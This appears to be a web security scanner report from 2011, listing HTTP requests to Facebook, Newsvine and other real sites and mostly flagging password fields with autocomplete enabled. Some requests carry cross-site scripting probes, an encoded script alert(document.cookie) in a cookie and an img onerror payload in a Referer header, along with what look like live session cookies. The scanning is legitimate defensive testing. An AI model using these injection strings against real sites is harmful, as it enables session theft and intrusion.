GET /2008/fbml HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=GX4VM; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 01:52:38 GMT Content-Length: 11463
The form contains the following password field with autocomplete enabled:
pass
Request
GET /HelenASPopkin HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=rt6y1; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHelenASPopkin; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:48 GMT Content-Length: 14974
The form contains the following password field with autocomplete enabled:
pass
Request
GET /plugins/likebox.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 404 Not Found Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 01:22:21 GMT Content-Length: 11156
The form contains the following password field with autocomplete enabled:
pass
Request
GET /sharer.php HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=DtsRk; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 01:52:50 GMT Content-Length: 10625
The form contains the following password field with autocomplete enabled:
pass
Request
GET /todd.kenreck HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=87286159.1296076830.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); datr=ac4nTYEA6yNv1vkgFgkPGkCj; __utma=87286159.599939457.1296076830.1296076830.1296076830.1; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Devents.cbs6albany.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fevents.cbs6albany.com%252Falbany-ny%252Fevents%252Fperforming%252Bartsa1daa%2525253cscript%2525253ealert%25252528document.cookie%25252529%2525253c%2525252fscript%2525253ef524f3c9c61%26extra_2%3DUS;
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly Set-Cookie: lsd=VUacU; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ftodd.kenreck; path=/; domain=.facebook.com Content-Type: text/html; charset=utf-8 Connection: close Date: Sun, 30 Jan 2011 03:05:49 GMT Content-Length: 14802
The form contains the following password field with autocomplete enabled:
login_password
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 29 Jan 2011 23:53:34 GMT Date: Sat, 29 Jan 2011 23:53:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 48095
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The page contains a form with the following action URL:
https://www.newsvine.com/_tools/user/login
The form contains the following password field with autocomplete enabled:
pass
Request
GET /_tools/user/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:58:04 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=3670341b4e7c29240de918b35bcfb885; expires=Sat, 25-Jan-2031 01:58:04 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 17589
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/accounts/login HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:58:45 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 10103
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/Login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/accounts/msnbc/newsletters HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:23:00 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 41168
The form contains the following password fields with autocomplete enabled:
pass
confirm
Request
GET /_nv/accounts/register HTTP/1.1 Host: www.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 01:22:53 GMT Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com Cache-Control: no-store, private, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 11769
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.14 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 55984
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/backyard/greenhouse HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 66241
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/backyard/tools HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:58 GMT Content-Length: 20666 Connection: close
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/help/faq HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:41 GMT Content-Length: 19412 Connection: close
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/info/codeOfHonor HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:48 GMT Content-Length: 22633 Connection: close
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/info/companyInfo HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:51 GMT Content-Length: 19220 Connection: close
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/info/contact HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:43 GMT Content-Length: 20175 Connection: close
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/info/copyrightPolicy HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:55 GMT Content-Length: 21217 Connection: close
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/info/jobs HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:51 GMT Content-Length: 22585 Connection: close
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/info/privacyPolicy HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:53 GMT Content-Length: 32656 Connection: close
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/info/userAgreement HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=299 Date: Sun, 30 Jan 2011 03:16:53 GMT Connection: close Connection: Transfer-Encoding Content-Length: 48326
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_nv/cms/welcome HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:32 GMT Content-Length: 16514 Connection: close
The page contains a form with the following action URL:
https://www.newsvine.com/_nv/api/accounts/login
The form contains the following password field with autocomplete enabled:
password
Request
GET /_vine/a HTTP/1.1 Host: www.polls.newsvine.com Proxy-Connection: keep-alive Referer: http://www.polls.newsvine.com/_vine/printer?call=streamSessionObjects§ionDomain=www&path=/_vine/3c3db971ca91afcd)(sn=*/pierre35aee%3Cimg%20src%3da%20onerror%3dalert(1)%3E16f5f70bd5e Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vid=55d515b4f7dadf9aee6395750020b187; TZM=-360; s_cc=true; s_sq=%5B%5BB%5D%5D; jt_time=1296350654008
Response
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 01:36:34 GMT Connection: close Vary: Accept-Encoding Content-Length: 15051
The form contains the following password field with autocomplete enabled:
password
Request
GET /_vine/js/m1/vine.js?v=23247 HTTP/1.1 Host: www.polls.newsvine.com Proxy-Connection: keep-alive Referer: http://polls.newsvine.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TZM=-360; jt_time=1296350654008; sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; vid=55d515b4f7dadf9aee6395750020b187; s_cc=true; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Fri, 26 Mar 2010 01:03:28 GMT ETag: "1258584-113ed-482a9bb29b800" Accept-Ranges: bytes Content-Type: text/javascript Cache-Control: max-age=470797 Expires: Sat, 05 Feb 2011 01:54:30 GMT Date: Sun, 30 Jan 2011 15:07:53 GMT Connection: close Vary: Accept-Encoding Content-Length: 70637
The form contains the following password field with autocomplete enabled:
password
Request
GET /blog/observations/ HTTP/1.1 Host: www.scientificamerican.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
password
Request
GET /tkfich_index/tkfich_home.htm HTTP/1.1 Host: www.six-telekurs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:03:20 GMT Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m PHP/5.2.13 mod_perl/2.0.4 Perl/v5.8.8 Content-Type: text/html Last-Modified: Sun, 30 Jan 2011 02:03:20 GMT ETag: "74935320-01010000" Expires: Sun, 30 Jan 2011 01:03:20 GMT Cache-Control: no-cache Content-Length: 26752 Connection: close
The page contains a form with the following action URL:
http://circle.stylemepretty.com/wp-login.php
The form contains the following password field with autocomplete enabled:
pwd
Request
GET /|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1 Host: www.stylemepretty.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 02:03:24 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.16 Vary: Cookie,Accept-Encoding Set-Cookie: wpmp_switcher=desktop; expires=Mon, 30-Jan-2012 02:03:25 GMT; path=/ X-Pingback: http://www.stylemepretty.com/xmlrpc.php X-Mobilized-By: WordPress Mobile Pack 1.2.0 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Sun, 30 Jan 2011 02:03:25 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40283
The form contains the following password field with autocomplete enabled:
PassWord
Request
GET / HTTP/1.1 Host: www.unmannedspaceflight.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The form contains the following password field with autocomplete enabled:
PassWord
Request
GET / HTTP/1.1 Host: www.unmannedspaceflight.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.
Issue remediation
Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.